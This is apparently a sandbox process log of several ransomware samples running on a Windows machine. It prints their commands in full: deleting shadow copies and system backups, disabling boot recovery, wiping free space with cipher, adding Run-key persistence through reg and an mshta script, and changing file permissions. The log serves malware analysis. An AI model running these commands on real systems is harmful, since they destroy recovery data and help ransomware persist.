C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
PID:2672 -
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Local\Temp\EJQTK.bat"4⤵PID:8152
-
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exeTrojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1828 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exerojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious behavior: RenamesItself
PID:1288 -
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe > nul4⤵PID:3780
-
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.myha-ff8a5433014a2728854d1d8bf9ea66af18ae0b3cee9c5d671cdff59426a0843d.exeTrojan-Ransom.Win32.Foreign.myha-ff8a5433014a2728854d1d8bf9ea66af18ae0b3cee9c5d671cdff59426a0843d.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1260 -
C:\Users\Admin\AppData\Local\Microsoft\msconfig.exeC:\Users\Admin\AppData\Local\Microsoft\msconfig.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:448
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exeTrojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1648 -
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe"3⤵
- Executes dropped EXE
PID:4764
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe"3⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
PID:3468 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe4⤵
- Adds Run key to start application
PID:4484
-
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exeTrojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2116
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exeTrojan-Ransom.Win32.Gen.hrl-cf31156df08d27e16fb25b16c42176b04fa7d968e18c58e9017c7d85ffce4435.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1652 -
C:\Windows\SysWOW64\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3800
-
-
C:\Users\Admin\AppData\Roaming\Buomf\otheo.exe"C:\Users\Admin\AppData\Roaming\Buomf\otheo.exe"3⤵
- Checks computer location settings
- Adds Run key to start application
- Sets desktop wallpaper using registry
- Modifies registry class
PID:4968 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\[HOW_TO_DECRYPT_FILES].html4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3192 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3192 CREDAT:275457 /prefetch:25⤵
- Drops desktop.ini file(s)
- Modifies Internet Explorer settings
PID:6080
-
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\cipher.exe" /W:C4⤵
- Suspicious use of SetWindowsHookEx
PID:2092
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\cipher.exe" /W:F4⤵
- Suspicious use of SetWindowsHookEx
PID:6556
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_5a59414b.bat"4⤵PID:2244
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_72a44b2a.bat"4⤵PID:4288
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_b485b959.bat"3⤵PID:5832
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exeTrojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1988 -
C:\Users\Admin\Desktop\00361\2aua0mwa.exe"C:\Users\Admin\Desktop\00361\2aua0mwa.exe" -n3⤵
- Executes dropped EXE
PID:1852
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v README /t REG_SZ /d "\"%ProgramFiles%\Windows NT\Accessories\wordpad.exe\" \"C:\Users\Admin\AppData\Roaming\#Decrypt_Files_ReadMe#.rtf"" /f & WMIC.exe shadowcopy delete /nointeractive & vssadmin.exe delete shadows /all /quiet3⤵PID:4344
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v README /t REG_SZ /d "\"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe\" \"C:\Users\Admin\AppData\Roaming\#Decrypt_Files_ReadMe#.rtf"" /f4⤵
- Adds Run key to start application
PID:5992
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC.exe shadowcopy delete /nointeractive4⤵PID:6080
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:856
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\AUTHORS.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\AUTHORS.txt"3⤵PID:3268
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Program Files\VideoLAN\VLC\AUTHORS.txt" /E /G Admin:F /C4⤵PID:5364
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\AUTHORS.txt"4⤵
- Views/modifies file attributes
PID:3688
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\COPYING.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\COPYING.txt"3⤵PID:1224
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Program Files\VideoLAN\VLC\COPYING.txt" /E /G Admin:F /C4⤵PID:3556
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\COPYING.txt"4⤵
- Views/modifies file attributes
PID:3864
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt"3⤵PID:1564
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt" /E /G Admin:F /C4⤵
- System Location Discovery: System Language Discovery
PID:2684
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2248
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\NEWS.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\NEWS.txt"3⤵PID:5296
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Program Files\VideoLAN\VLC\NEWS.txt" /E /G Admin:F /C4⤵PID:1708
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\NEWS.txt"4⤵
- Views/modifies file attributes
PID:5904
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\README.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\README.txt"3⤵PID:4520
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Program Files\VideoLAN\VLC\README.txt" /E /G Admin:F /C4⤵
- System Location Discovery: System Language Discovery
PID:3236
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\README.txt"4⤵
- Views/modifies file attributes
PID:3528
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files\VideoLAN\VLC\THANKS.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\THANKS.txt"3⤵PID:2680
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Program Files\VideoLAN\VLC\THANKS.txt" /E /G Admin:F /C4⤵PID:1872
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB -R -A -S -H "C:\Program Files\VideoLAN\VLC\THANKS.txt"4⤵
- Views/modifies file attributes
PID:3368
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT"3⤵PID:3356
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT" /E /G Admin:F /C4⤵PID:4824
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT"4⤵
- Views/modifies file attributes
PID:1872
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵PID:5940
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C4⤵PID:1256
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"4⤵
- Views/modifies file attributes
PID:5856
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵
- System Location Discovery: System Language Discovery
PID:5828 -
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C4⤵PID:1664
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"4⤵
- Views/modifies file attributes
PID:2844
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:5628
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C4⤵PID:2180
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"4⤵
- Views/modifies file attributes
PID:3120
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵PID:5096
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C4⤵PID:6236
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:6364
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵PID:6412
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C4⤵PID:6096
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"4⤵
- Views/modifies file attributes
PID:5284
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3452
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3544
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5164
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6700
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7356
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:264
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7400
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7428
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7548
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6896
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3924
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5296
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4704
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7696
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7744
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7840
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C CACLS "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G %USERNAME%:F /C & ATTRIB -R -A -S -H "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4992
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exeTrojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1788 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS" /Delete /tn "gxx speed launcher" /f3⤵PID:1944
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a3⤵
- Network Service Discovery
- System Location Discovery: System Language Discovery
PID:2304
-
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exeTrojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe" "C:\Users\Admin\AppData\Roaming\database.exe"3⤵
- System Location Discovery: System Language Discovery
PID:2448
-
-
C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe"C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe" runas3⤵
- Executes dropped EXE
- Loads dropped DLL
- Access Token Manipulation: Create Process with Token
PID:2616 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe" "C:\Users\Admin\AppData\Roaming\database.exe"4⤵PID:5020
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
PID:1604 -
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('database.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\XKOQon',i);}catch(e){}},10);"5⤵
- Adds Run key to start application
- Modifies Internet Explorer settings
PID:5528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:05⤵PID:2988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic SHADOWCOPY DELETE5⤵PID:3912
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic SHADOWCOPY DELETE6⤵PID:5548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /All /Quiet5⤵PID:2976
-
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /All /Quiet6⤵
- Interacts with shadow copies
PID:4812
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No5⤵PID:2316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵PID:3716
-
-
